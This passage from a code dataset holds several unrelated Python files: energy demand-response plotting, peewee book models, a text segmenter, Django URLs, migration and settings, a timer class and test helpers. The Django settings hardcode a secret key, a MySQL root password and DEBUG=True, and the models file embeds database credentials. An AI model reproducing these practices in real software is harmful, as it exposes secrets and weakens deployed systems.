df_gas_1 = pd.Series(index=bus_elec_seqs.index)\n\n # Generators RE\n df_wind = bus_elec_seqs[\n (('wind', 'bus_elec'), 'flow')].rename('wind', inplace=True)\n\n df_pv = bus_elec_seqs[\n (('pv', 'bus_elec'), 'flow')].rename('pv', inplace=True)\n\n # Shortage/Excess\n df_shortage = bus_elec_seqs[\n (('shortage_el', 'bus_elec'), 'flow')].rename('shortage', inplace=True)\n\n df_excess = bus_elec_seqs[\n (('bus_elec', 'excess_el'), 'flow')].rename('excess', inplace=True)\n\n # ---------------- Extract DSM results (all approaches) ---------------------\n # Parts of results extraction is dependent on kwargs (might be removed later)\n use_no_shed = kwargs.get('use_no_shed', False)\n\n # Demand after DSM\n df_demand_dsm = bus_elec_seqs[\n (('bus_elec', 'demand_dsm'), 'flow')].rename('demand_dsm',\n inplace=True)\n\n # Downwards shifts (shifting)\n df_dsmdo_shift = dsm_seqs.iloc[:, dsm_seqs.columns.str[1]\n == 'dsm_do_shift'].sum(\n axis=1).rename('dsm_do_shift', inplace=True)\n\n # Downwards shifts (shedding)\n if not (approach == \"DLR\" and use_no_shed):\n df_dsmdo_shed = dsm_seqs.iloc[:, dsm_seqs.columns.str[1]\n == 'dsm_do_shed'].sum(\n axis=1).rename('dsm_do_shed', inplace=True)\n else:\n df_dsmdo_shed = pd.Series(index=dsm_seqs.index)\n\n # Upwards shifts\n df_dsmup = dsm_seqs.iloc[:, dsm_seqs.columns.str[1]\n == 'dsm_up'].sum(\n axis=1).rename('dsm_up', inplace=True)\n\n # Print the sequences for the demand response unit in order to include\n # proper slicing\n # print(dsm_seqs.columns)\n\n df_dsm_add = None\n\n # Get additional DSM results dependent on approach considered\n if approach == \"TUD\":\n # DSM storage level\n df_dsmsl = dsm_seqs.iloc[:, dsm_seqs.columns.str[1]\n == 'dsm_sl'].sum(\n axis=1).rename('dsm_sl', inplace=True)\n\n df_dsm_add = df_dsmsl.copy()\n\n elif approach == \"DLR\":\n # Original shift values\n df_dsmdo_orig = df_dsmdo_shift.copy().rename('dsm_do_orig',\n inplace=True)\n df_dsmup_orig = df_dsmup.copy().rename('dsm_up_orig',\n inplace=True)\n\n # Balacing values\n df_dsmdo_bal = dsm_seqs.iloc[:, dsm_seqs.columns.str[1]\n == 'balance_dsm_do'].sum(\n axis=1).rename('balance_dsm_do', inplace=True)\n df_dsmup_bal = dsm_seqs.iloc[:, dsm_seqs.columns.str[1]\n == 'balance_dsm_up'].sum(\n axis=1).rename('balance_dsm_up', inplace=True)\n\n # DSM storage levels\n df_dsmsldo = dsm_seqs.iloc[:, dsm_seqs.columns.str[1]\n == 'dsm_do_level'].sum(\n axis=1).rename('dsm_sl_do', inplace=True)\n df_dsmslup = dsm_seqs.iloc[:, dsm_seqs.columns.str[1]\n == 'dsm_up_level'].sum(\n axis=1).rename('dsm_sl_up', inplace=True)\n\n df_dsmdo_shift = df_dsmdo_orig.add(df_dsmup_bal).rename('dsm_do_shift',\n inplace=True)\n df_dsmup = df_dsmup_orig.add(df_dsmdo_bal).rename('dsm_up',\n inplace=True)\n\n df_dsm_add = pd.concat([df_dsmdo_orig, df_dsmup_orig,\n df_dsmdo_bal, df_dsmup_bal,\n df_dsmsldo, df_dsmslup], axis=1)\n\n # Effective DSM shift (shifting only)\n df_dsm_tot = df_dsmdo_shift - df_dsmup\n df_dsm_tot.rename('dsm_tot', inplace=True)\n\n # DSM storage level\n df_dsm_acum = df_dsm_tot.cumsum()\n df_dsm_acum.rename('dsm_acum', inplace=True)\n\n # Original demand before DSM\n df_demand_el = [_ for _ in model.NODES.data() if str(_) == 'demand_dsm'][0].demand\n df_demand_el.rename('demand_el', inplace=True)\n\n # Capacity limit for upshift\n df_capup = [_ for _ in model.NODES.data() if str(_) == 'demand_dsm'][0].capacity_up\n df_capup.rename('cap_up', inplace=True)\n\n # Capacity limit for downshift\n df_capdo = [_ for _ in model.NODES.data() if str(_) == 'demand_dsm'][0].capacity_down\n df_capdo.rename('cap_do', inplace=True)\n\n # ####### Merge alld data into one DataFrame\n df_model = pd.concat([df_coal_1, df_gas_1, df_wind, df_pv, df_excess, df_shortage,\n df_demand_dsm, df_dsmdo_shift, df_dsmdo_shed, df_dsmup,\n df_dsm_tot, df_dsm_acum, df_demand_el,\n df_capup, df_capdo],\n axis=1)\n\n # Add additional dsm values for certain approaches\n if df_dsm_add is not None:\n df_model = pd.concat([df_model, df_dsm_add], axis=1, sort=False)\n\n return df_model\n\n\ndef plot_dsm(df_gesamt, directory, project, days, **kwargs):\n \"\"\" Create a plot of DSM activity \"\"\"\n figsize = kwargs.get('figsize', (15, 10))\n save = kwargs.get('save', False)\n approach = kwargs.get('approach', None)\n include_approach = kwargs.get('include_approach', False)\n include_generators = kwargs.get('include_generators', False)\n ax1_ylim = kwargs.get('ax1_ylim', [-10, 250])\n ax2_ylim = kwargs.get('ax2_ylim', [-110, 150])\n\n use_no_shed = kwargs.get('use_no_shed', False)\n\n # ############ DATA PREPARATION FOR FIGURE #############################\n\n # Create Figure\n for info, slice in df_gesamt.resample(str(days) + 'D'):\n\n # Generators from model\n # hierarchy for plot: wind, pv, coal, gas, shortage\n if include_generators:\n graph_wind = slice.wind.values\n graph_pv = graph_wind + slice.pv.values\n graph_coal = graph_pv + slice.coal1.values\n graph_gas = graph_coal + slice.gas1.values\n graph_shortage = graph_gas + slice.shortage.values\n\n #################\n # first axis\n # get_ipython().run_line_magic('matplotlib', 'notebook')\n fig, ax1 = plt.subplots(figsize=figsize)\n ax1.set_ylim(ax1_ylim)\n\n # x-Axis date format\n ax1.xaxis_date()\n ax1.xaxis.set_major_formatter(mdates.DateFormatter('%d.%m - %H h')) # ('%d.%m-%H h'))\n ax1.set_xlim(info - pd.Timedelta(1, 'h'), info + pd.Timedelta(days * 24 + 1, 'h'))\n plt.xticks(pd.date_range(start=info._date_repr, periods=days * 24, freq='H'), rotation=90)\n\n # Demands\n # ax1.plot(range(timesteps), dsm, label='demand_DSM', color='black')\n ax1.step(slice.index, slice.demand_el.values, where='post', label='Demand', linestyle='--', color='blue')\n ax1.step(slice.index, slice.demand_dsm.values, where='post', label='Demand after DSM', color='black')\n\n # DSM Capacity\n ax1.step(slice.index, slice.demand_el + slice.cap_up, where='post', label='DSM Capacity', color='red',\n linestyle='--')\n ax1.step(slice.index, slice.demand_el - slice.cap_do, where='post', color='red', linestyle='--')\n\n # Generators\n if include_generators:\n ax1.fill_between(slice.index, 0, graph_wind, step='post', label='Wind', facecolor='darkcyan', alpha=0.5)\n ax1.fill_between(slice.index, graph_wind, graph_pv, step='post', label='PV', facecolor='gold', alpha=0.5)\n ax1.fill_between(slice.index, graph_pv, graph_coal, step='post', label='Coal', facecolor='black', alpha=0.5)\n ax1.fill_between(slice.index, graph_coal, graph_gas, step='post', label='Gas', facecolor='brown', alpha=0.5)\n # ax1.fill_between(slice.index, slice.demand_dsm.values, graph_coal,\n # step='post',\n # label='Excess',\n # facecolor='firebrick',\n # hatch='/',\n # alpha=0.5)\n\n ax1.legend(bbox_to_anchor=(0., 1.1, 1., .102), loc=3, ncol=4, mode=\"expand\", borderaxespad=0.)\n\n # plt.xticks(range(0,timesteps,5))\n\n plt.grid()\n\n ###########################\n # Second axis\n ax2 = ax1.twinx()\n ax2.xaxis_date()\n ax2.xaxis.set_major_formatter(mdates.DateFormatter('%d.%m - %H h')) # ('%d.%m-%H h'))\n ax2.set_xlim(info - pd.Timedelta(1, 'h'), info + pd.Timedelta(days * 24 + 1, 'h'))\n plt.xticks(pd.date_range(start=info._date_repr, periods=days * 24, freq='H'), rotation=90)\n\n ax2.set_ylim(ax2_ylim)\n # align_yaxis(ax1, 100, ax2, 0)\n\n # DSM up/down\n\n # ax2.step(slice.index, slice.dsm_acum, where='post',\n # label='DSM acum', alpha=0.5, color='orange')\n\n ax2.fill_between(slice.index, 0, -slice.dsm_do_shift,\n step='post',\n label='DSM_down_shift',\n facecolor='red',\n # hatch='.',\n alpha=0.3)\n if not (approach == \"DLR\" and use_no_shed):\n ax2.fill_between(slice.index, -slice.dsm_do_shift,\n -(slice.dsm_do_shift + slice.dsm_do_shed),\n step='post',\n label='DSM_down_shed',\n facecolor='blue',\n # hatch='.',\n alpha=0.3)\n ax2.fill_between(slice.index, 0, slice.dsm_up,\n step='post',\n label='DSM_up',\n facecolor='green',\n # hatch='.',\n alpha=0.3)\n # ax2.fill_between(slice.index, 0, slice.dsm_acum,\n ax2.plot(slice.index, slice.dsm_acum,\n linestyle='none',\n markersize=8,\n marker=\"D\",\n color=\"dimgrey\",\n fillstyle='none',\n drawstyle=\"steps-post\",\n # step='post',\n label='DSM acum',\n # facecolor=None,\n # hatch='x',\n # alpha=0.0)\n )\n\n # Legend axis 2\n ax2.legend(bbox_to_anchor=(0., -0.3, 1., 0.102), loc=3, ncol=3, borderaxespad=0., mode=\"expand\")\n ax1.set_xlabel('Time t in h')\n ax1.set_ylabel('MW')\n ax2.set_ylabel('$\\Delta$ MW')\n\n if approach is not None:\n plt.title(approach)\n\n plt.show()\n\n if save:\n fig.set_tight_layout(True)\n name = 'Plot_' + project + '_' + info._date_repr + '.png'\n if include_approach:\n name = 'Plot_' + project + '_' + approach + '_' + info._date_repr + '.png'\n fig.savefig(directory + 'graphics/' + name)\n plt.close()\n print(name + ' saved.')\n","sub_path":"INREC_examples/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":14449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"279770345","text":"import os\nfrom peewee import PostgresqlDatabase, Model, PrimaryKeyField, CharField, IntegerField, ForeignKeyField, TextField, DeferredThroughModel, ManyToManyField\nfrom playhouse.db_url import connect\n\n'''\nDB_NAME = os.getenv('DB_NAME', 'isbn_metadata')\nDB_USER = os.getenv('DB_USER', 'super')\nDB_PASS = os.getenv('DB_PASS', '123')\nDB_HOST = os.getenv('DB_HOST', 'localhost')\nDB_PORT = os.getenv('DB_PORT', '')\n\ndatabase = PostgresqlDatabase(\n DB_NAME,\n user=DB_USER,\n password=DB_PASS,\n host=DB_HOST,\n)\n'''\ndatabase_url = os.getenv('DATABASE_URL', 'postgresql://super:123@localhost:5432/isbn_metadata')\ndatabase = connect(database_url)\n\nclass BaseModel(Model):\n class Meta:\n database = database\n\n\nclass Author(BaseModel):\n id = PrimaryKeyField(null=False)\n name = CharField(max_length=255, unique=True)\n\n\nAuthorThroughDeferred = DeferredThroughModel()\n\n\nclass Book(BaseModel):\n id = PrimaryKeyField(null=False)\n google_book_id = CharField(max_length=12, unique=True)\n title = CharField(max_length=255)\n subtitle = CharField(max_length=255, null=True)\n description = TextField(null=True)\n published_date = CharField(max_length=45, null=True)\n isbn_10 = CharField(max_length=10, null=True, unique=True)\n isbn_13 = CharField(max_length=13, null=True, unique=True)\n publisher = CharField(max_length=255, null=True)\n page_count = CharField(max_length=45, null=True)\n print_type = CharField(max_length=45, null=True)\n language = CharField(max_length=45, null=True)\n main_category = CharField(max_length=255, null=True)\n authors = ManyToManyField(Author, backref='books',\n through_model=AuthorThroughDeferred)\n\n\nclass AuthorBook(BaseModel):\n author = ForeignKeyField(Author, backref='books_through')\n book = ForeignKeyField(Book, backref='authors_through')\n\n\nAuthorThroughDeferred.set_model(AuthorBook)\n\n\ndef create_tables():\n with database:\n database.drop_tables([Author, Book, AuthorBook])\n database.create_tables([Author, Book, AuthorBook])\n","sub_path":"web/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"385159727","text":"import re\ndef seg_char(sent):\n \"\"\"\n 把句子按字分开,不破坏英文结构\n \"\"\"\n # 首先分割 英文 以及英文和标点\n pattern_char_1 = re.compile(r'([\\W])')\n parts = pattern_char_1.split(sent)\n parts = [p for p in parts if len(p.strip())>0]\n # 分割中文\n result = []\n pattern = re.compile(r'([\\u4e00-\\u9fa5])')\n for p in parts:\n chars = pattern.split(p)\n chars = [w for w in chars if len(w.strip())>0]\n result += chars\n return result\n\n\ns = \"啊今天是个good day啊!天气非常的nice,12sad 3123我想打110了\"\nprint(seg_char(s))\n","sub_path":"test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"605038556","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('parfum_db', '0020_parfum_type_parfum_type_description'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='perfumeingridientcategory',\n name='keynote',\n field=models.CharField(default=b'', max_length=200, verbose_name=b'\\xd0\\xb4\\xd0\\xbe\\xd0\\xbc\\xd0\\xb8\\xd0\\xbd\\xd0\\xb8\\xd1\\x80\\xd1\\x83\\xd1\\x8e\\xd1\\x89\\xd0\\xb0\\xd1\\x8f \\xd0\\xbd\\xd0\\xbe\\xd1\\x82\\xd0\\xb0', blank=True),\n ),\n ]\n","sub_path":"parfum_db/migrations/0021_perfumeingridientcategory_keynote.py","file_name":"0021_perfumeingridientcategory_keynote.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"166862995","text":"from django.conf.urls import url\r\nfrom . import views\r\n\r\n\r\napp_name='user_functions'\r\nurlpatterns = [\r\n url(r'^$', views.landing, name='landing'),\r\n url(r'^login/$', views.login_view, name='login'),\r\n url(r'^logout/$', views.logout_view, name='logout'),\r\n url(r'^register/$', views.register, name='register'),\r\n url(r'^hub/$', views.hub, name='hub'),\r\n url(r'^settings/(?P\\d+)/$', views.settings, name='settings'),\r\n ]\r\n","sub_path":"user_functions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"466364683","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nDjango settings for srlab project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os, sys\nfrom django.contrib import messages\n\nBASE_DIR = os.path.dirname(__file__)\nsys.path.insert(0, os.path.join(BASE_DIR, 'libs'))\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '06^h73s*up*0i&_uf0z2h)7$7ad6w!2by(lk87x0v$40xh!6bn'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django_admin_bootstrapped.bootstrap3',\n 'django_admin_bootstrapped',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'bootstrap3',\n 'select_multiple_field',\n 'bootstrapform',\n 'datetimewidget',\n 'srlab_admin',\n)\n\nDAB_FIELD_RENDERER = 'django_admin_bootstrapped.renderers.BootstrapFieldRenderer'\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nADMINS = (\n ('Admin', 'enoquejoseneas@gmail.com'),\n)\n\nROOT_URLCONF = 'srlab.urls'\n\nWSGI_APPLICATION = 'srlab.wsgi.application'\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n # 'default': {\n # 'ENGINE': 'django.db.backends.sqlite3',\n # 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n # }\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'srlab',\n 'USER': 'root',\n 'PASSWORD': 'Toti131',\n 'HOST': 'localhost',\n 'PORT': '',\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'pt-br'\n\nTIME_ZONE = 'America/Sao_Paulo'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, \"static\"),\n '/var/www/srlab/static/',\n)\n\nSTATIC_URL = '/var/www/srlab/static/'\n\n# Put strings here, like \"/home/html/django_templates\"\n# Always use forward slashes, even on Windows.\n# Don't forget to use absolute paths, not relative paths.\nTEMPLATE_DIRS = (\n os.path.join(BASE_DIR, 'templates/'),\n)\n\n#django admin com boostrap\n#https://github.com/django-admin-bootstrapped/django-admin-bootstrapped\n#para usar bootstrap no frontend: http://www.tangowithdjango.com/book17/chapters/bootstrap.html\n#encontrei correção para o erro em:\n#https://colab.interlegis.leg.br/browser/django-admin-bootstrapped/django_admin_bootstrapped/templates/admin/includes/fieldset.html?rev=35a3e978c711d4d22047a19e2386a491edb5b4b6\n\nMESSAGE_TAGS = {\n messages.SUCCESS: 'alert-success success',\n messages.WARNING: 'alert-warning warning',\n messages.ERROR: 'alert-danger error'\n}\n\nEMAIL_HOST = 'localhost'\nEMAIL_PORT = 25\n# EMAIL_USE_TLS = False\n# EMAIL_HOST_USER = 'root' # username of one of my user on the first server\n# EMAIL_HOST_PASSWORD = 'Toti131'\n\n#DEFAULT_CONTENT_TYPE = 'application/xhtml+xml'\n\n# messages.success(request, \"My success message\")\n# messages.warning(request, \"My warning message\")\n# messages.error(request, \"My error message\")\n# ver o app instalado ao usar os forms no frontend\n# https://django-bootstrap-form.readthedocs.org/en/latest/","sub_path":"srlab/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"9832486","text":"#!/usr/bin/env python\r\n\r\nimport requests\r\nimport urllib2\r\nfrom bs4 import BeautifulSoup, SoupStrainer\r\nfrom historical_price import *\r\nfrom keystockdata import *\r\nfrom balance_sheet import *\r\nfrom income_statement import *\r\nfrom cashflow import *\r\n\r\ndef clear_screen():\r\n\tif os.name == 'nt':\r\n\t\tos.system(\"cls\")\r\n\telse:\r\n\t\tos.system(\"clear\")\r\n\t\t\r\n\r\ndef convert_to_number(cell):\r\n if cell == '-':\r\n return 0\r\n else:\r\n return cell\r\n\t\r\ndef getHTMLPage(baseURL):\r\n\tr = requests.get(baseURL)\r\n\tsoup = BeautifulSoup(r.text.encode('utf-8'), 'html.parser')\r\n\t\r\n\treturn soup\r\n\r\ndef logFile():\r\n\treturn\r\n\t\r\n\t\r\ndef main():\r\n\tcreateKeyStockDataCSV(\"PRESTAR\")\r\n\tcreateHistoricalPriceCSV(\"PRESTAR\", 180)\r\n\tcreateBalanceSheetCSV(\"PRESTAR\", \"annual\")\r\n\tcreateBalanceSheetCSV(\"PRESTAR\", \"quarter\")\r\n\tcreateIncomeStatementCSV(\"PRESTAR\", \"annual\")\r\n\tcreateIncomeStatementCSV(\"PRESTAR\", \"quarter\")\r\n\tcreateCashFlowCSV(\"PRESTAR\", \"annual\")\r\n\tcreateCashFlowCSV(\"PRESTAR\", \"quarter\")\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\r\nif __name__ == \"__main__\":\r\n main()\r\n\t\r\n","sub_path":"front_end/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"82662880","text":"import os\nfrom pathlib import Path\nfrom unittest.mock import Mock, patch\n\nfrom tornado.testing import AsyncHTTPTestCase\nfrom tornado.web import Application\n\nfrom mhs.builder.ebxml_ack_message_builder import EbXmlAckMessageBuilder\nfrom mhs.handler.async_response_handler import AsyncResponseHandler\nfrom mhs.parser.ebxml_message_parser import EbXmlRequestMessageParser\nfrom utilities.file_utilities import FileUtilities\nfrom utilities.message_utilities import MessageUtilities\nfrom utilities.xml_utilities import XmlUtilities\n\nMESSAGES_DIR = \"messages\"\nREQUEST_FILE = \"ebxml_request.msg\"\nEXPECTED_RESPONSE_FILE = \"ebxml_ack.xml\"\nFROM_PARTY_ID = \"FROM-PARTY-ID\"\nCONTENT_TYPE_HEADERS = {\"Content-Type\": 'multipart/related; boundary=\"--=_MIME-Boundary\"'}\nREF_TO_MESSAGE_ID = \"B4D38C15-4981-4366-BDE9-8F56EDC4AB72\"\nEXPECTED_MESSAGE = ''\n\n\nclass TestAsyncResponseHandler(AsyncHTTPTestCase):\n \"\"\"A simple integration test for the async response endpoint.\"\"\"\n\n current_dir = os.path.dirname(os.path.abspath(__file__))\n message_dir = Path(current_dir) / MESSAGES_DIR\n\n def setUp(self):\n self.callbacks = {}\n super().setUp()\n\n def get_app(self):\n ack_builder = EbXmlAckMessageBuilder()\n message_parser = EbXmlRequestMessageParser()\n return Application([\n (r\".*\", AsyncResponseHandler,\n dict(ack_builder=ack_builder, message_parser=message_parser, callbacks=self.callbacks,\n party_id=FROM_PARTY_ID))\n ])\n\n @patch.object(MessageUtilities, \"get_timestamp\")\n @patch.object(MessageUtilities, \"get_uuid\")\n def test_post(self, mock_get_uuid, mock_get_timestamp):\n mock_get_uuid.return_value = \"5BB171D4-53B2-4986-90CF-428BE6D157F5\"\n mock_get_timestamp.return_value = \"2012-03-15T06:51:08Z\"\n expected_ack_response = FileUtilities.get_file_string(str(self.message_dir / EXPECTED_RESPONSE_FILE))\n request_body = FileUtilities.get_file_string(str(self.message_dir / REQUEST_FILE))\n mock_callback = Mock()\n self.callbacks[REF_TO_MESSAGE_ID] = mock_callback\n\n ack_response = self.fetch(\"/\", method=\"POST\", body=request_body, headers=CONTENT_TYPE_HEADERS)\n\n self.assertEqual(ack_response.code, 200)\n self.assertEqual(ack_response.headers[\"Content-Type\"], \"text/xml\")\n XmlUtilities.assert_xml_equal(expected_ack_response, ack_response.body)\n mock_callback.assert_called_with(EXPECTED_MESSAGE)\n\n def test_post_no_callback(self):\n # If there is no callback registered for the message ID the response is in reference to, an HTTP 500 should be\n # returned.\n request_body = FileUtilities.get_file_string(str(self.message_dir / REQUEST_FILE))\n\n response = self.fetch(\"/\", method=\"POST\", body=request_body, headers=CONTENT_TYPE_HEADERS)\n\n self.assertEqual(response.code, 500)\n","sub_path":"mhs-reference-implementation/mhs/handler/tests/test_async_response_handler.py","file_name":"test_async_response_handler.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"260565146","text":"\"\"\"snippet_manager URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.urls import include, path\nfrom core import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('accounts/', include('registration.backends.simple.urls')),\n path(\"\", views.index, name=\"index\"),\n path('core/add/', views.add_snippet, name='add_snippet'),\n path('core/details//', views.snippet_details, name='snippet_details',),\n path('core/edit//', views.edit_snippet, name='edit_snippet'),\n path('core/delet//', views.delete_snippet, name='delete_snippet'),\n path('core/search/', views.search_results, name='search_results'),\n]\n\nif settings.DEBUG:\n import debug_toolbar\n urlpatterns = [\n path('__debug__/', include(debug_toolbar.urls)),\n\n # For django versions before 2.0:\n # url(r'^__debug__/', include(debug_toolbar.urls)),\n ] + urlpatterns\n","sub_path":"snippet_manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"294074576","text":"import contextlib\nfrom typing import Mapping\nfrom timeit import default_timer as time\nimport warnings\n\n\nclass Timer:\n \"\"\"Class to accumulate timings for named operations.\"\"\"\n\n def __init__(self):\n self._clock_starts = {}\n self._accumulated_time = {}\n self._hit_count = {}\n self._enabled = True\n\n def start(self, name: str):\n \"\"\"Start timing a given named operation.\"\"\"\n if self._enabled:\n if name in self._clock_starts:\n raise ValueError(f\"clock already started for '{name}'\")\n else:\n self._clock_starts[name] = time()\n\n def stop(self, name: str):\n \"\"\"Stop timing a given named operation, add the time elapsed to\n accumulated timing and increase the hit count.\n \"\"\"\n if self._enabled:\n if name not in self._accumulated_time:\n self._accumulated_time[name] = time() - self._clock_starts.pop(name)\n else:\n self._accumulated_time[name] += time() - self._clock_starts.pop(name)\n if name not in self._hit_count:\n self._hit_count[name] = 1\n else:\n self._hit_count[name] += 1\n\n @contextlib.contextmanager\n def clock(self, name: str):\n \"\"\"Context manager to produce timings of operations.\n\n Args:\n name: the name of the operation being timed\n\n Example:\n The context manager times operations that happen within its context. The\n following would time a time.sleep operation::\n\n >>> import time\n >>> from fv3gfs.util import Timer\n >>> timer = Timer()\n >>> with timer.clock(\"sleep\"):\n ... time.sleep(1)\n ...\n >>> timer.times\n {'sleep': 1.0032463260000029}\n \"\"\"\n self.start(name)\n yield\n self.stop(name)\n\n @property\n def times(self) -> Mapping[str, float]:\n \"\"\"accumulated timings for each operation name\"\"\"\n if len(self._clock_starts) > 0:\n warnings.warn(\n \"Retrieved times while clocks are still going, \"\n \"incomplete times are not included: \"\n f\"{list(self._clock_starts.keys())}\",\n RuntimeWarning,\n )\n return self._accumulated_time.copy()\n\n @property\n def hits(self) -> Mapping[str, int]:\n \"\"\"accumulated hit counts for each operation name\"\"\"\n if len(self._clock_starts) > 0:\n warnings.warn(\n \"Retrieved hit counts while clocks are still going, \"\n \"incomplete times are not included: \"\n f\"{list(self._clock_starts.keys())}\",\n RuntimeWarning,\n )\n return self._hit_count.copy()\n\n def reset(self):\n \"\"\"Remove all accumulated timings.\"\"\"\n self._accumulated_time.clear()\n self._hit_count.clear()\n\n def enable(self):\n \"\"\"Enable the Timer.\"\"\"\n self._enabled = True\n\n def disable(self):\n \"\"\"Disable the Timer.\"\"\"\n if len(self._clock_starts) > 0:\n raise RuntimeError(\n \"Cannot disable timer while clocks are still going: \"\n f\"{list(self._clock_starts.keys())}\"\n )\n self._enabled = False\n\n @property\n def enabled(self) -> bool:\n \"\"\"Indicates whether the timer is currently enabled.\"\"\"\n return self._enabled\n\n\nclass NullTimer(Timer):\n \"\"\"A Timer class which does not actually accumulate timings.\n\n Meant to be used in place of an optional timer.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self._enabled = False\n\n def enable(self):\n \"\"\"Enable the Timer.\"\"\"\n raise NotImplementedError(\n \"NullTimer cannot be enabled, maybe create a Timer and \"\n \"disable it instead of using NullTimer\"\n )\n\n @property\n def enabled(self) -> bool:\n \"\"\"Indicates whether the timer is currently enabled.\"\"\"\n return False\n","sub_path":"fv3gfs/util/_timing.py","file_name":"_timing.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"374649749","text":"# Copyright (c) 2017 Red Hat.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport uuid\n\nfrom os_vif import objects as osv_objects\nfrom os_vif.objects import vif as osv_vif\nfrom oslo_serialization import jsonutils\n\n\ndef _fake_vif(cls=osv_vif.VIFOpenVSwitch):\n vif = cls(\n id=uuid.uuid4(),\n vif_name='h_interface',\n bridge_name='bridge',\n address='3e:94:b7:31:a0:83',\n port_profile=osv_objects.vif.VIFPortProfileOpenVSwitch(\n interface_id='89eccd45-43e9-43d8-b4cc-4c13db13f782',\n profile_id=str(uuid.uuid4()),\n ),\n )\n vif.network = osv_objects.network.Network(id=uuid.uuid4(), mtu=1)\n subnet = osv_objects.subnet.Subnet(\n uuid=uuid.uuid4(),\n dns=['192.168.0.1'],\n cidr='192.168.0.0/24',\n gateway='192.168.0.1',\n routes=osv_objects.route.RouteList(objects=[]),\n )\n subnet.ips = osv_objects.fixed_ip.FixedIPList(objects=[])\n subnet.ips.objects.append(\n osv_objects.fixed_ip.FixedIP(address='192.168.0.2'))\n vif.network.subnets.objects.append(subnet)\n vif.active = True\n return vif\n\n\ndef _fake_vif_dict(obj=None):\n if obj:\n return obj.obj_to_primitive()\n else:\n return _fake_vif().obj_to_primitive()\n\n\ndef _fake_vif_string(dictionary=None):\n if dictionary:\n return jsonutils.dumps(dictionary)\n else:\n return jsonutils.dumps(_fake_vif_dict())\n\n\ndef 